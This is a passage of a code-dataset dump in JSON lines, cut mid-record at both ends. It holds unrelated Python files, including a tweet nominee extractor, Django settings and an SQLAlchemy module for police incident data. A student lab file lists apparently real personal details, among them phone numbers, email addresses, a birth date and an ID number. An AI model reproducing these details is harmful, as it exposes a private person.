name='save_ils_note'),\n url(r'^report_runs/(?P\\d+)/delete/$', ReportRunDeleteView.as_view(), name='delete_report_run'),\n url(r'^report_runs/$', ReportRunListView.as_view(), name='report_run_list'),\n url(r'^slab_configuration/$', SLABConfigurationView.as_view(), name='slab_configuration'),\n url(r'^slab_edit_location/(?P[\\w-]+)', SLABEditLocationView.as_view(), name='slab_edit_location')\n)\n","sub_path":"custom/ilsgateway/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"118431236","text":"#!/usr/bin/env python3\n\nfrom time import sleep\n\nfrom deck import Deck\n#from curses_render import CursesRenderer as Renderer\nfrom text_render import TextRenderer as Renderer\n\ndef overflow_test(deck, render):\n\tcard = deck.draw()\n\ttry:\n\t\tfor i in range(100000):\n\t\t\trender.show(card)\n\t\t\tsleep(0.1)\n\texcept OverflowError:\n\t\tsleep(1)\n\t\trender.clear()\n\ndef main():\n\trender = Renderer()\n\tdeck = Deck()\n#\thand = deck.deal(len(deck))\n#\tfor i in range(len(hand)):\n#\t\trender.show(hand[i])\n\toverflow_test(deck, render)\n\trender.getinput(render.waitprompt)\n\tdel render\n\tdel deck\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"211737276","text":"\"\"\"\nLab Evaluation of Python CAP930\nProf. Manikant Roy\n11707259\n\"\"\"\n\nemployee = {\"Personal Details\":({\"First Name\":\"Amalendu\", \"Last Name\":\"Kar\",\"Date Of Birth\":\"26/01/1995\",\n \"Address\":{\"Permanent\":{\"City\":\"Bethuadahari\",\"Dist\":\"Nadia\",\"Pin\":741126,\"State\":\"WestBengale\"}},\"AdharId\":(1475126987452364)}), #using Tuple For Adharcard\n \"Academic Details\":{\"School\":{\"Course\":\"10+2\",\"Name\":\"Bethuadahari JCM High School\",\n \"Address\":{\"City\":\"Bethuadahari\",\"pin\":741126,\"Dist\":\"Nadia\",\"State\":\"West Bengal\",\"Board\":\"State Board\"}},\n \"College\":{\"Course\":\"BCA\",\"Name\":\"Lovely Professional University\",\n \"Address\":{\"City\":\"Phagwara\",\"pin\":114111,\"Dist\":\"Jalandhar\",\"State\":\"Punjab\",\"University\":\"Lovely Professional University\"}}\n },\n \n \"Contact Details\":{\"Mob Num\":[9874938545,8609834146],\"Email\":[\"amal1995kar@gmail.com\",\"amalendu@gmail.com\"]}, #using List For Multiple Phone Numbers and Emails\n \"Professional Details\":{\"Organization\":\"TCS\",\"EmployeeID\":(11707259),\"Position\":\"Event Manager\",\"Join Date\":(\"11/2/2014\")}\n \n \n }\n\n#print Dictionary of Employee\nfor k, v in employee.items():\n print(k,v)\n","sub_path":"pythontest.py","file_name":"pythontest.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"588741195","text":"import nltk\r\nimport sys\r\nfrom src import helpers\r\nfrom nltk.tokenize import TweetTokenizer as tokenizer\r\n\r\ndef main(tweets, award, sw, is_person):\r\n\tif 'cecil' in award:\r\n\t\treturn []\r\n\r\n\tnominee_candidates = {}\r\n\tnominee_sw = ['nominee', 'nominated', 'nomination', 'nominate', 'nominees', 'nominations']\r\n\r\n\tif is_person:\r\n\t\tlow, high = 2, 3\r\n\telse:\r\n\t\tlow, high = 1, 3\r\n\ttkn_award = tokenizer().tokenize(award)\r\n\r\n\tfor tweet in tweets:\r\n\t\ttrash = True\r\n\t\tlower_tweet = [x.lower() for x in tweet['clean']]\r\n\t\tif any([s in 
lower_tweet for s in nominee_sw]):\r\n\t\t\tlower_raw = [tkn.lower() for tkn in tweet['raw']]\r\n\t\t\tclean_tweet = [tkn for tkn in lower_tweet if all([tkn not in stop for stop in [sw, nominee_sw, tkn_award]])]\r\n\r\n\t\t\tfor i in range(low, high):\r\n\t\t\t\tfor phrase in helpers.ngrams(clean_tweet, i):\r\n\t\t\t\t\tfront = lower_raw.index(phrase[0])\r\n\t\t\t\t\tback = lower_raw.index(phrase[-1]) + 1\r\n\t\t\t\t\tif is_person and back - front != i:\r\n\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\t\tname = ' '.join(lower_raw[front:back])\r\n\r\n\t\t\t\t\tif name in award:\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\tif name in nominee_candidates:\r\n\t\t\t\t\t\tnominee_candidates[name] += 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tnominee_candidates[name] = 1\r\n\r\n\trankings = [(name, v) for name, v in sorted(nominee_candidates.items(), key=lambda item: item[1])]\r\n\trankings.reverse()\r\n\tnominees = [n[0] for n in rankings[:6]]\r\n\r\n\treturn nominees","sub_path":"src/queries/query_nominees.py","file_name":"query_nominees.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"438040417","text":"import random\nimport os\n\nmrpa2sampa = {\n 'p': 'p',\n 'b': 'b',\n 't': 't',\n 'd': 'd',\n 'k': 'k',\n 'm': 'm',\n 'n': 'n',\n 'l': 'l',\n 'r': 'r',\n 'f': 'f',\n 'v': 'v',\n 's': 's',\n 'z': 'z',\n 'h': 'h',\n 'w': 'w',\n 'g': 'g',\n 'ch': 'tS',\n 'jh': 'dZ',\n 'ng': 'N',\n 'th': 'T',\n 'dh': 'D',\n 'sh': 'S',\n 'zh': 'Z',\n 'y': 'j',\n 'ii': 'i:',\n 'aa': 'A:',\n 'oo': 'O:',\n 'uu': 'u:',\n '@@': '3:',\n 'i': 'I',\n 'e': 'e',\n 'a': '{',\n 'uh': 'V',\n 'o': 'Q',\n 'u': 'U',\n '@': '@',\n 'ei': 'eI',\n 'ai': 'aI',\n 'oi': 'OI',\n 'ou': '@U',\n 'au': 'aU',\n 'I@': 'I@',\n 'e@': 'e@',\n 'u@': 'U@'\n}\n\n'''\nMRPA SAMPA Example\np p put\nb b but\nt t ten\nd d den\nk k can\nm m man\nn n not\nl l like\nr r run\nf f full\nv v very\ns s some\nz z zeal\nh h hat\nw w went\ng g game\nch tS chain\njh dZ Jane\nng N long\nth T thin\ndh D then\nsh S ship\nzh Z measure\ny j yes\nii i: bean\naa A: barn\noo O: born\nuu u: boon\n@@ 3: burn\ni I pit\ne e pet\na { pat\nuh V putt\no Q pot\nu U good\n@ @ about\nei eI bay\nai aI buy\noi OI boy\nou @U no\nau aU now\nI@ I@ peer\ne@ e@ pair\nu@ U@ poor\n'''\ndef text2phn(text_path):\n os.system('perl transcribe.pl \"%s\"' % text_path)\n trans = '/tmp/trans.txt'\n f = open(trans,'r')\n fpho = open(trans+'.pho','w')\n lines = f.readlines()\n for line in lines:\n for letter in line.split(' '):\n l = letter.strip()\n if l =='': l='_'\n if l =='i': l='aI'\n if l =='oo': l='O:'\n if l=='@@': l='3:'\n if l=='a': l='{'\n try: l = mrpa2sampa[l]\n except: pass\n\n if l:\n if l=='_':\n dur = 100\n freq = 100\n percent = 100\n fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n #fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n #fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n else:\n # chinglish\n # dur = random.randint(50,250)\n # freq = random.randint(50,300)\n\n # \n dur = random.randint(50,100)\n freq = random.randint(100,200)\n #dur = 100\n #freq = 100\n #percent = 100\n fpho.write('%s %d %d %d\\n' % (l, dur, percent, freq))\n fpho.close()\n f.close()\n'''\ndef text2phn(text_path='test.txt'):\n maxPhnNameLen=4; # max number of char in a phoneme name\n silencePhn='_';\n #while(len(silencePhn)0):\n # phn+='__'\n\n phonemes+=phn\n\n phn='_'\n #while (len(phn)'''\n# content+=''''''\n content=''''''\n return 
content\n","sub_path":"end/cgi-bin/singlecomment.py","file_name":"singlecomment.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"279409475","text":"import os\n\nfrom .settings import *\n\nMEDIA_ROOT = STORAGE_ROOT\n\nSITE_ID = int(os.getenv(\"SITE_ID\") or \"1\")\n\nDEFAULT_FILE_STORAGE = 'contentcuration.utils.gcs_storage.GoogleCloudStorage'\nSESSION_ENGINE = \"django.contrib.sessions.backends.db\"\n\n# email settings\nEMAIL_BACKEND = 'postmark.django_backend.EmailBackend'\nPOSTMARK_API_KEY = os.getenv(\"EMAIL_CREDENTIALS_POSTMARK_API_KEY\")\n\nLANGUAGE_CODE = os.getenv(\"LANGUAGE_CODE\") or \"en\"\n\n# Google drive settings\nGOOGLE_STORAGE_REQUEST_SHEET = \"1uC1nsJPx_5g6pQT6ay0qciUVya0zUFJ8wIwbsTEh60Y\"\nGOOGLE_AUTH_JSON = os.getenv(\"GOOGLE_DRIVE_AUTH_JSON\") or GOOGLE_AUTH_JSON\n\nkey = (os.getenv(\"SENTRY_DSN_KEY\")\n .strip()) # strip any possible trailing newline\nrelease_commit = os.getenv(\"RELEASE_COMMIT_SHA\")\nif key and release_commit:\n RAVEN_CONFIG = {\n 'dsn': 'https://{secret}@sentry.io/1252819'.format(secret=key),\n # If you are using git, you can also automatically configure the\n # release based on the git info.\n 'release': release_commit,\n 'environment': os.getenv(\"BRANCH_ENVIRONMENT\"),\n }\n","sub_path":"contentcuration/contentcuration/production_settings.py","file_name":"production_settings.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"249144022","text":"import os\nfrom tqdm import tqdm\nimport pickle\nimport shutil\n\ndata = pickle.load(open('./data/sentence_gamjung.pkl', 'rb'))\ndata_dir = 'data'\ntrain_dir = 'train_data'\nif os.path.exists(train_dir):\n\tprint('Directory already exists.')\n\texit()\n\nos.makedirs(train_dir)\nfor path in tqdm(data['image_path']):\n\tdir_path = train_dir + '/' + path.split('/')[0]\n\tif not os.path.exists(dir_path):\n\t\tos.makedirs(dir_path)\n\tshutil.copy(data_dir + '/' + path, train_dir + '/' + path)\n","sub_path":"make_train_dataset.py","file_name":"make_train_dataset.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"440393222","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 21 14:46:42 2020\r\n\r\n@author: tanta\r\n\"\"\"\r\n\r\na=input(\"địa chỉ email muốn gửi thư: \")\r\nb=input(\"thông điệp gửi thư: \")\r\nc=input(\"số lần gửi thư: \")\r\ncounter=1\r\nn=int(input(\"nhập vào số lần lặp: \"))\r\nwhile counter <= n: \r\n counter=counter+1\r\n print(\"địa chỉ email muốn gửi thư: \",a)\r\n print(\"thông điệp muốn gửi thư: \",b)\r\n print(\"số lần gửi thư: \",c)","sub_path":"bài 8(chương 4).py","file_name":"bài 8(chương 4).py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"204487565","text":"import random\n\ndef main():\n casos = 200\n file = open(\"input2.in\",\"w+\")\n file.write(str(casos)+\"\\n\")\n for x in range(casos):\n file.write(str(30000)+\"\\n\")\n word = \"\"\n for y in range(30000):\n v = random.randrange(2)\n if v == 0:\n word += \"(\"\n else:\n word += \")\"\n file.write(word+\"\\n\")\n file.write(str(100)+\"\\n\")\n for y in range(100):\n v = random.randrange(4)\n if (v == 0):\n file.write(\"0\"+\"\\n\")\n else:\n vv = random.randrange(30000)\n file.write(str(vv)+\"\\n\")\n \n\nif __name__ == 
\"__main__\":\n main()\n","sub_path":"practicas/oia_selectivo_2015_entrenamiento/extra_problems/Brackets/case_generator.py","file_name":"case_generator.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"190035716","text":"import collections\n\nfrom decoder.field import BasicField, WireField, ComputedField, RepeatingGroup, LookupField, TrimmedString\nfrom decoder.descriptor import Descriptor\n\nfrom decoder.decoder import Decoder, Verbosity\n\n\nclass Decoder(Decoder):\n \"\"\" filter module\n\n This module filters output streams\n\n \"\"\"\n\n def __parse_options(self, opts):\n self.__start_sequence = opts.get('start-sequence', None)\n self.__end_sequence = opts.get('end-sequence', None)\n self.__allow_unsequenced = opts.get('allow-unsequenced', False)\n self.__required_keys = None\n if 'required-keys' in opts:\n self.__required_keys = opts['required-keys'].split(',')\n self.__sent_keys = None\n if 'send-keys' in opts:\n self.__sent_keys = [x.strip() for x in opts['send-keys'].split(',')]\n self.__keyvals = []\n if 'keyvals' in opts:\n for keyval in opts['keyvals'].split(','):\n pair = keyval.split('=')\n self.__keyvals.append(pair)\n self.__allowed_modules = None\n if 'modules' in opts:\n self.__allowed_modules = opts['modules'].split(',')\n\n\n\n def __init__(self, opts, next_decoder):\n super(Decoder, self).__init__('output/filter', opts, next_decoder)\n self.__parse_options(opts)\n # init summary data\n self.__filtered_messages = 0\n self.__allowed_messages = 0\n self.__total_messages = 0\n\n def on_message(self, context, payload):\n \"\"\" incoming packet and filter the output\n\n :rtype : none\n :param context: Message context build by preceding link in decoder chain\n :param payload: Message payload\n \"\"\"\n\n self.__total_messages += 1\n allow = True\n\n # check to see if the sequence number is filtered\n cur_sequence = context.get('sequence-number', None)\n if cur_sequence is not None:\n if self.__start_sequence is not None:\n if cur_sequence < self.__start_sequence:\n allow = False\n if self.__end_sequence is not None:\n if cur_sequence > self.__end_sequence:\n allow = False\n else:\n if self.__allow_unsequenced == False:\n allow = False\n\n # check to see if we're allowing only messages with specific key-value pairs\n if allow == True and len(self.__keyvals) is not 0:\n for key, val in self.__keyvals:\n if key not in context:\n allow = False\n elif val != context[key]:\n allow = False\n\n # check to see if we're allowing only messages with specific keys\n if allow == True and self.__required_keys is not None:\n for key in self.__required_keys:\n if key.strip() not in context:\n allow = False\n\n if allow:\n self.__allowed_messages += 1\n # filter in only allowed-keys, if specified\n if self.__sent_keys is not None:\n filteredContext = collections.OrderedDict()\n for key in self.__sent_keys:\n if key.strip() in context:\n filteredContext.update({key.strip(): context[key.strip()]})\n context = filteredContext\n # filter in explicitly allowed modules\n if self.__allowed_modules is not None:\n filteredContext = collections.OrderedDict()\n for key, value in context.iteritems():\n keymod = key.split('-')[0]\n if keymod in self.__allowed_modules:\n filteredContext.update({key: value})\n context = filteredContext\n\n if context:\n self.dispatch_to_next(context, payload)\n else:\n self.__filtered_messages += 1\n\n\n\n\n def summarize(self):\n \"\"\" Provides summary statistics from this 
Decoder\n \"\"\"\n return {\n \"filter-filtered\": self.__filtered_messages,\n \"filter-allowed\": self.__allowed_messages,\n \"filter-total\": self.__total_messages\n }\n\n\n","sub_path":"decoder/output/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"291773892","text":"\"\"\"\nThis module should hold everything related to the database including:\n- Connections\n- Queries\n- Bot Scripts\n\nDeclarative_base:\nhttps://docs.sqlalchemy.org/en/13/orm/extensions/declarative/api.html#sqlalchemy.ext.declarative.declarative_base\n\nSessions:\nhttps://docs.sqlalchemy.org/en/14/orm/session_basics.html#using-a-sessionmaker\n\nScoped session:\nhttps://docs.sqlalchemy.org/en/14/orm/contextual.html\n\nTyping:\nhttps://docs.python.org/3/library/typing.html\n\n\"\"\"\n\nfrom sqlalchemy.orm.session import Session\nfrom sqlalchemy.sql.expression import table\n# from app.main import activate\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom sqlalchemy.orm import relationship, sessionmaker, scoped_session\n\nfrom dotenv import load_dotenv, find_dotenv\nfrom random import random as rand\nimport os\n\nfrom sqlalchemy import create_engine, inspect, select, update, func, and_\nfrom sqlalchemy import Column, Integer, String, Date, Float, Boolean, ForeignKey\n\nfrom typing import List, Dict\n\nload_dotenv(find_dotenv())\n\ndb_url = os.getenv(\"DB_URL\")\n\n# connects to database for SQL operations, echo generates the activity log\nengine = create_engine(db_url, echo=True)\n\n# describes db tables and defines classes that will be mapped to those tables\nBase = declarative_base()\n\n\nclass ForceRanks(Base):\n \"\"\"\n Describes the Postgres table AND\n maps a path to those tables\n \"\"\"\n __tablename__ = \"force_ranks\" # name formatting has to be this way\n\n incident_id = Column(\n Integer, # defines column type\n primary_key=True, # assigns primary key\n nullable=False,\n unique=True)\n incident_date = Column(Date, nullable=False)\n tweet_id = Column(String(255))\n user_name = Column(String(255))\n description = Column(String(10000), nullable=False)\n city = Column(String(255), default=None)\n state = Column(String(255), default=None)\n lat = Column(Float)\n long = Column(Float)\n title = Column(String(255), default=None)\n force_rank = Column(String(255), default=None)\n status = Column(String(255), default='pending', nullable=False)\n confidence = Column(Float)\n tags = Column(String(255))\n src = Column(String(8000))\n children = relationship(\"Conversations\", back_populates=\"parent\")\n\n def __repr__(self):\n return \"incident_id:{}, incident_date:{}, tweet_id:{}, user_name:{}, description:{}, city:{}, state:{}, lat:{}, long:{}, title:{}, force_rank:{}, status:{}, confidence:{}, tags:{}, src:{}\".format(\n self.incident_id,\n self.incident_date,\n self.tweet_id,\n self.user_name,\n self.description,\n self.city,\n self.state,\n self.lat,\n self.long,\n self.title,\n self.force_rank,\n self.status,\n self.confidence,\n self.tags,\n self.src\n )\n\n\nclass Conversations(Base):\n __tablename__ = \"conversations\"\n\n id = Column(Integer, primary_key=True)\n incident_id = Column(Integer, ForeignKey('force_ranks.incident_id'))\n tweet_id = Column(String(255))\n form = Column(Integer)\n root_tweet_city = Column(String(255))\n root_tweet_state = Column(String(255))\n root_tweet_lat = Column(Float)\n root_tweet_long = Column(Float)\n root_tweet_date = 
Column(Date)\n root_tweet_force_rank = Column(String(255), default=None)\n sent_tweet_id = Column(String)\n received_tweet_id = Column(String)\n in_reply_to_id = Column(String)\n tweeter_id = Column(String)\n conversation_status = Column(Integer)\n tweet_text = Column(String)\n checks_made = Column(Integer)\n reachout_template = Column(String)\n isChecked = Column(Boolean)\n parent = relationship(\"ForceRanks\", back_populates=\"children\")\n\n def __repr__(self):\n return (\n \"id:{}, tweet_id:{}, form:{}, root_tweet_city:{}, root_tweet_state:{}, root_tweet_lat:{}, root_tweet_long:{}, root_tweet_date:{}, root_tweet_force_rank:{}, sent_tweet_id:{}, received_tweet_id:{}, in_reply_to_id:{}, tweeter_id:{}, conversation_status:{}, tweet_text:{}, checks_made:{}, reachout_template:{}, isChecked:{}\").format(\n self.id,\n self.tweet_id,\n self.form,\n self.root_tweet_city,\n self.root_tweet_state,\n self.root_tweet_lat,\n self.root_tweet_long,\n self.root_tweet_date,\n self.root_tweet_force_rank,\n self.sent_tweet_id,\n self.received_tweet_id,\n self.in_reply_to_id,\n self.tweeter_id,\n self.conversation_status,\n self.tweet_text,\n self.checks_made,\n self.reachout_template,\n self.isChecked\n )\n\n\nclass Training(Base):\n __tablename__ = \"training\"\n\n id = Column(Integer, primary_key=True)\n tweets = Column(String)\n labels = Column(Integer)\n\n def __repr__(self):\n return (\n \"id:{}, tweets:{}, labels:{}\"\n ).format(self.id, self.tweets, self.labels)\n\n\nclass BotScripts(Base):\n __tablename__ = \"bot_scripts\"\n\n script_id = Column(\n Integer, primary_key=True, nullable=False, unique=True)\n script = Column(String(255))\n convo_node = Column(Integer)\n use_count = Column(Integer)\n positive_count = Column(Integer)\n # success_rate = Column(Float)\n active = Column(Boolean)\n\n\n def __repr__(self):\n # positive_count:{}, success_rate:{}\n return (\n \"script_id:{}, script:{}, convo_node:{}, use_count:{}, positive_count:{}, active:{}\"\n ).format(\n self.script_id,\n self.script,\n self.convo_node,\n self.use_count,\n self.positive_count,\n #self.success_rate,\n self.active\n )\n\n\n def add_script(self, data):\n \"\"\"\n Updates the bot_scripts table with new row passing the given script\n and indicated conversation node into their respective columns. 
Sets the\n 'use_count' and 'positive_count' columns for this row to the default\n of 0, the 'success_rate' column defaults to 0.0, and 'active' defaults to True.\n Auto generates a new 'script_ID' incrementally for scripts at all\n conversation nodes except 'welcome', which will need to use a helper\n function which authenticates the welcome message with\n Twitter and generates a different ID.\n \"\"\"\n\n if data.script_id != 0:\n # data['script_id'] = # Use id from Twitter auth function (to be written or grabbed from Brody O.)\n pass\n else:\n # data['script_id'] = # Auto generate the next incremental id\n pass\n\n # Database.insert_script(data)\n\n def activate_script(script_id):\n script_id = int(script_id)\n db = Database()\n \n # Data is a BotScripts class obj\n data = db.get_table(BotScripts, BotScripts.script_id, script_id)[-1][-1]\n \n if data.active == True:\n data.active = False\n else:\n data.active = True\n \n with db.Sessionmaker() as session: \n session.add(data)\n session.commit()\n\n\n def add_to_use_count(script_id):\n \"\"\"\n Uses functions from db.py as helper to increment the use_count\n \"\"\"\n old_count = Database.get_table(BotScripts.use_count, BotScripts.script_id, script_id)\n print(old_count)\n new_count = old_count[0][0] + 1\n Database.bump_use_count(script_id, new_count)\n\n def add_to_positive_count(script_id):\n \"\"\"\n Uses functions from db.py as helper to increment the positive_count\n \"\"\"\n data = Database.get_counts(script_id)\n use = data[0][0]\n pos = data[0][1]\n\n pos += 1\n rate = pos / use\n Database.update_pos_and_success(script_id, pos, rate)\n\n # Functions for selection of scripts\n \"\"\" FUTURE update: add randomized functionality to choose between path-based\n script selection based on training from the 'script_training' and\n path-generating options (the latter exist below). Possibly set this up to occur\n automatically once results from training sessions of path-based data are\n available.\n\n Also consider setting up testing to occur automatically once\n sufficient training data becomes available. Also consider scheduling
Also consider scheduling\n automatic training per a given number of data points received thereafter.\n Reccomend having said training take place on another optional instance\n (with the bot sentiment analysis) as memory on current instance is running\n low.\n \"\"\"\n\n def choose_script(self, status):\n \"\"\"\n Used to select a script for use by the twitter bot given a\n conversation node.\n Returns a tuple containing the script and its id to be used by the\n Twitter bot.\n The script for the conversation and the script_id to be used in\n another two function calls within the bot to update\n the use_count in 'bot_scripts' when the bot send the message\n as well as updating the path in 'script_testing' a\n fter the bot pairs this script_id with an incident_id.\n\n -----\n In a future implementation try switching between\n choosing a random script and\n choosing the better of two as originally coded.\n -----\n\n \"\"\"\n\n # Pull the list of scripts for a convo_node given\n script_data = Database.get_scripts_per_node(\n self.convo_node_dict[status])\n\n # Randomly select two script objects\n l = len(script_data)\n x = int(str(rand())[-6:])\n y = int(str(rand())[-6:])\n a = x % l\n b = y % l\n\n # conditional for selecting the best of two when count is achieved\n if script_data[a][2] > 100 and script_data[b][2] > 100:\n if script_data[a][3] >= script_data[b][3]:\n use = a\n else:\n use = b\n else:\n if x >= y:\n use = a\n else:\n use = b\n\n return (script_data[use][0], script_data[use][1])\n\nclass ScriptTesting(Base):\n __tablename__ = \"script_testing\"\n\n incident_id = Column(\n Integer, primary_key=True, nullable=False, unique=True)\n\n script_path = Column(String(100))\n success = Column(Boolean)\n\n def __repr__(self):\n return (\n \"incident_id:{}, script_path:{}, success:{}\"\n ).format(\n self.incident_id,\n self.script_path,\n self.success\n )\n\n\nclass Sources(Base):\n __tablename__ = \"sources\"\n\n source_id = Column(Integer, primary_key=True, nullable=False, unique=True)\n incident_id = Column(Integer, ForeignKey(\"force_ranks.incident_id\"))\n source = Column(String(255))\n\n def __repr__(self):\n return (\n \"source_id:{}, incident_id:{}, sources:{}\"\n ).format(\n self.source_id,\n self.incident_id,\n self.source\n )\n\n\nclass Tags(Base):\n __tablename__ = \"tags\"\n\n tags_id = Column(Integer, primary_key=True, nullable=False, unique=True)\n incident_id = Column(Integer, ForeignKey(\"force_ranks.incident_id\"))\n tag = Column(String(40))\n\n def __repr__(self):\n return (\n \"tags_id:{}, incident_id:{}, sources:{}\"\n ).format(\n self.tags_id,\n self.incident_id,\n self.tag\n )\n\n\nclass Database(object):\n\n def __init__(self):\n self.engine = create_engine(\n db_url,\n pool_recycle=3600,\n pool_size=10,\n echo=False,\n pool_pre_ping=True\n )\n\n self.Sessionmaker = scoped_session(\n sessionmaker(\n autoflush=False,\n autocommit=False,\n bind=self.engine\n )\n )\n\n self.TABLE_NAMES = {\"force_ranks\": ForceRanks,\n \"conversations\": Conversations,\n \"bot_scripts\": BotScripts,\n \"script_testing\": ScriptTesting,\n \"tags\": Tags,\n \"sources\": Sources\n }\n\n def get_conversation_root(self, root_id: int):\n \"\"\" Get conversation with a specific root_tweet_id \"\"\"\n with self.Sessionmaker() as session:\n query = select(Conversations).where(\n Conversations.tweet_id == root_id)\n conversations_data = session.execute(query)\n return [i[0] for i in conversations_data.fetchall()]\n\n def get_script_ids(self, convo_node):\n \"\"\"\n Gets the script_ids associated 
with the given convo_node\n ONLY KEPT FOR FUTURE USE.\n This function can be replaced with get_table().\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(BotScripts.script_id).where(\n BotScripts.convo_node == convo_node\n )\n script_ids_data = session.execute(query).fetchall()\n return script_ids_data\n\n def get_script(self, script_id):\n \"\"\"\n Gets a script from 'bot_scripts' table for given script_id(s)\n ONLY KEPT FOR FUTURE USE.\n This function can be replaced with get_table().\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(\n BotScripts.script\n ).where(BotScripts.script_id == script_id)\n\n script_data = session.execute(query).fetchall()\n return script_data\n\n def get_all_script_data(self):\n \"\"\"\n ONLY KEPT FOR FUTURE USE.\n This function can be replaced with get_table().\n Selects all from 'bot_scripts'\n ---Labs 39 ---> you may need to tailor the output type here for\n populating the Script Management modal, consult your front end peeps\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(BotScripts)\n bot_scripts_data = session.execute(query).fetchall()\n\n return bot_scripts_data\n\n def insert_script(self, new_script):\n \"\"\"\n Updates the bot_scripts table with a new row passing the given script\n and indicated conversation node into their respective columns.\n Sets the 'use_count' and 'positive_count' columns for this row\n to the default of 0. The 'active' column is set to True by default.\n Generates a new 'script_ID' unique to this script.\n \"\"\"\n\n with self.Sessionmaker() as session:\n BS = BotScripts()\n BS.script_id = new_script.script_id\n BS.script = new_script.script\n BS.convo_node = new_script.convo_node\n BS.use_count = new_script.use_count\n BS.positive_count = new_script.positive_count\n BS.success_rate = new_script.success_rate\n BS.active = new_script.active\n session.add(BS)\n session.commit()\n\n def get_use_count(self, script_id):\n \"\"\"\n Gets the use_count from 'bot_scripts' for given script_id\n ONLY KEPT FOR FUTURE USE.\n This function can be replaced with get_table().\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(\n BotScripts.use_count\n ).where(BotScripts.script_id == script_id)\n\n use_count = session.execute(query).fetchall()\n\n return use_count\n\n def get_counts(self, script_id):\n \"\"\"\n Gets use_count and positive_count from 'bot_scripts' given script_id\n \"\"\"\n with self.Sessionmaker() as session:\n query = select(\n BotScripts.use_count,\n BotScripts.positive_count,\n ).where(BotScripts.script_id == script_id)\n\n counts = session.execute(query).fetchall()\n\n return counts\n\n def get_scripts_per_node(self, convo_node):\n \"\"\"\n Gets scripts and their ids, use counts and success rates for a given\n conversation node all for the use of the script selection process.\n \"\"\"\n with self.Sessionmaker() as session:\n query = (\n select(BotScripts.script_id,\n BotScripts.script,\n BotScripts.use_count,\n BotScripts.success_rate\n ).where(BotScripts.convo_node == convo_node)\n )\n\n scripts = session.execute(query).fetchall()\n\n return scripts\n\n def bump_use_count(self, script_id, new_count):\n \"\"\" Updates the use_count for a script as identified by script_id \"\"\"\n with self.Sessionmaker() as session:\n count_dict = {\"use_count\": new_count}\n query = (\n update(BotScripts).where(\n BotScripts.script_id == script_id).values(**count_dict)\n )\n\n session.execute(query)\n session.commit()\n\n def update_pos_and_success(self, script_id, positive_count, 
success_rate):\n \"\"\" Updates the positive_count and success_rate for a given script_id \"\"\"\n with self.Sessionmaker() as session:\n data = {\"positive_count\": positive_count,\n \"success_rate\": success_rate\n }\n query = update(BotScripts).where(\n BotScripts.script_id == script_id\n ).values(**data)\n\n session.execute(query)\n session.commit()\n\n def insert_data_force_ranks(self, data: List[Dict]):\n \"\"\" inserts data into force_ranks \"\"\"\n with self.Sessionmaker() as session:\n last = select(func.max(ForceRanks.incident_id))\n last_value = session.execute(last).fetchall()[0][0]\n for i in range(len(data)):\n if last_value is None:\n last_value = 0\n last_value += 1\n data[i]['incident_id'] = last_value\n if type(data[i]['confidence']) != float \\\n and data[i]['confidence'] is not None:\n data[i]['confidence'] = data[i]['confidence'].item()\n obj = ForceRanks(**data[i])\n session.add(obj)\n session.commit()\n\n def insert_data_conversations(self, data):\n \"\"\" inserts data into conversations \"\"\"\n with self.Sessionmaker() as session:\n last = select(func.max(Conversations.id))\n last_value = session.execute(last).fetchall()[0][0]\n if last_value is None:\n last_value = 0\n if data.id is None:\n last_value += 1\n data.id = last_value\n session.add(data)\n session.commit()\n\n def update_tables(self, data, tweet_id, tablename):\n \"\"\" updates table 'tablename' columns of matching tweet_id \"\"\"\n if tablename == 'ForceRanks':\n table = ForceRanks\n elif tablename == 'Conversations':\n table = Conversations\n else:\n return\n\n query = update(table).where(\n table.tweet_id == str(tweet_id)\n ).values(**data)\n\n with self.Sessionmaker() as session:\n session.execute(query)\n session.commit()\n\n def get_root_twelve(self, root_id):\n \"\"\" gets root_ids with value of 12 \"\"\"\n with self.Sessionmaker() as session:\n query = (select(Conversations).\n filter(and_(Conversations.tweet_id == str(root_id),\n Conversations.conversation_status == 12)))\n check_data = session.execute(query)\n\n return check_data.fetchall()\n\n def get_root_twelve_majority(self, root_id, action):\n \"\"\" gets data on differences on incident id for admin review\"\"\"\n with self.Sessionmaker() as session:\n if action == 0:\n \"\"\"Summarizes the all city, state, and date numbers that are associated with an incident_id\"\"\"\n subjects = 